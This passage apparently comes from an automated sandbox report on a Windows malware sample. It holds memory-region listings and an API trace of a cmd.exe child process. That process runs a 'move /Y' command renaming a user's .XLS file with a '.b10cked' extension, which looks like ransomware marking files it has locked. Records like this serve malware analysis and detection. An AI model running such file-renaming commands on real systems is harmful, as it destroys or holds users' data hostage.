"C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10321 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10322 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10323 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10324 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 10325 start_va = 0x6a0000 end_va = 0x6a6fff entry_point = 0x6a0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10326 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10327 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10328 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10329 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name 
= "private_0x000000007ffdd000" filename = "" Region: id = 10330 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10331 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10332 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10333 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10334 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 10335 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 10336 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10337 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10338 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10339 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10340 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 
0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10341 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10342 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10343 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10344 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10345 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10346 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10347 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10348 start_va = 0x100000 end_va = 0x1c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 10349 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = 
"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10350 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 136 os_tid = 0x81c Process: id = "80" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16380" os_pid = "0x508" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10363 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10364 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10365 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10366 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 10367 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = 
mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 10368 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10369 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10370 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10371 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10372 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10393 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10394 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10395 start_va = 0x50000 end_va = 0x5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 10396 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10397 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 10398 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = 
"winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 10399 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10400 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10401 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10402 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10403 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10404 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10405 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10406 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10407 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000220000" filename = "" Region: id = 10408 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10409 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 10410 start_va = 0x60000 end_va = 0x66fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 10411 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 10412 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 10413 start_va = 0x90000 end_va = 0x90fff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 10414 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 10415 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 10416 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Thread: id = 137 os_tid = 0x82c [0127.734] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1af894 | out: lpSystemTimeAsFileTime=0x1af894*(dwLowDateTime=0x8611b0c0, dwHighDateTime=0x1d440a9)) [0127.734] GetCurrentProcessId () returned 0x508 [0127.734] GetCurrentThreadId () returned 0x82c [0127.734] GetTickCount () returned 0x28fdf [0127.734] QueryPerformanceCounter (in: lpPerformanceCount=0x1af88c | out: 
lpPerformanceCount=0x1af88c*=18452548285) returned 1 [0127.737] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0127.737] __set_app_type (_Type=0x1) [0127.737] __p__fmode () returned 0x76b331f4 [0127.737] __p__commode () returned 0x76b331fc [0127.737] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0127.737] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0127.737] GetCurrentThreadId () returned 0x82c [0127.738] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x82c) returned 0x38 [0127.738] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.738] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0127.738] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.738] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.738] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1af824 | out: phkResult=0x1af824*=0x0) returned 0x2 [0127.738] VirtualQuery (in: lpAddress=0x1af85b, lpBuffer=0x1af7f4, dwLength=0x1c | out: lpBuffer=0x1af7f4*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.738] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1af7f4, dwLength=0x1c | out: lpBuffer=0x1af7f4*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.738] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1af7f4, dwLength=0x1c | out: lpBuffer=0x1af7f4*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) 
returned 0x1c [0127.738] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1af7f4, dwLength=0x1c | out: lpBuffer=0x1af7f4*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.738] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1af7f4, dwLength=0x1c | out: lpBuffer=0x1af7f4*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0127.738] GetConsoleOutputCP () returned 0x1b5 [0127.738] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.738] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0127.738] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.738] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0127.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.739] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.739] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.739] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.739] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.739] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.739] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.739] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0127.739] GetEnvironmentStringsW () returned 0x300240* [0127.740] FreeEnvironmentStringsW (penv=0x300240) returned 1 [0127.740] GetEnvironmentStringsW () returned 0x300240* [0127.740] FreeEnvironmentStringsW (penv=0x300240) returned 1 [0127.740] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae794 | out: phkResult=0x1ae794*=0x40) returned 0x0 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae79c, 
lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x0, lpData=0x1ae7a0*=0xf0, lpcbData=0x1ae798*=0x1000) returned 0x2 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x1, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x0, lpData=0x1ae7a0*=0x1, lpcbData=0x1ae798*=0x1000) returned 0x2 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x0, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x40, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x40, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x0, lpData=0x1ae7a0*=0x40, lpcbData=0x1ae798*=0x1000) returned 0x2 [0127.740] RegCloseKey (hKey=0x40) returned 0x0 [0127.740] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae794 | out: phkResult=0x1ae794*=0x40) returned 0x0 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x0, 
lpData=0x1ae7a0*=0x40, lpcbData=0x1ae798*=0x1000) returned 0x2 [0127.740] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x1, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.741] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x0, lpData=0x1ae7a0*=0x1, lpcbData=0x1ae798*=0x1000) returned 0x2 [0127.741] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x0, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.741] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x9, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.741] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x4, lpData=0x1ae7a0*=0x9, lpcbData=0x1ae798*=0x4) returned 0x0 [0127.741] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae79c, lpData=0x1ae7a0, lpcbData=0x1ae798*=0x1000 | out: lpType=0x1ae79c*=0x0, lpData=0x1ae7a0*=0x9, lpcbData=0x1ae798*=0x1000) returned 0x2 [0127.741] RegCloseKey (hKey=0x40) returned 0x0 [0127.741] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886362 [0127.741] srand (_Seed=0x5b886362) [0127.741] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked\"" [0127.741] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move 
/Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked\"" [0127.741] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.741] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3019a0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0127.742] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.742] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.742] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.742] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.742] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.742] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.742] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.742] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.742] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.742] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.742] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.742] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.742] GetEnvironmentStringsW () returned 0x302390* [0127.742] FreeEnvironmentStringsW (penv=0x302390) returned 1 [0127.742] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0127.742] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.742] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.742] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.742] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.742] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.742] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.743] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.743] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.743] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.743] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af560 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.743] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af560, lpFilePart=0x1af55c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af55c*="Desktop") returned 0x18 [0127.743] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.743] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af2dc | out: lpFindFileData=0x1af2dc) returned 0x3000d0 [0127.743] FindClose (in: hFindFile=0x3000d0 | out: hFindFile=0x3000d0) returned 1 [0127.743] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af2dc | out: lpFindFileData=0x1af2dc) returned 0x3000d0 [0127.743] FindClose (in: hFindFile=0x3000d0 | out: hFindFile=0x3000d0) returned 1 [0127.743] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af2dc | out: lpFindFileData=0x1af2dc) returned 0x3000d0 [0127.743] FindClose (in: hFindFile=0x3000d0 | out: hFindFile=0x3000d0) returned 1 [0127.744] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.744] 
SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0127.744] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0127.744] GetEnvironmentStringsW () returned 0x302bb0* [0127.744] FreeEnvironmentStringsW (penv=0x302bb0) returned 1 [0127.744] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.744] GetConsoleOutputCP () returned 0x1b5 [0127.745] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.745] GetUserDefaultLCID () returned 0x409 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af6a0, cchData=128 | out: lpLCData="0") returned 2 [0127.745] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af6a0, 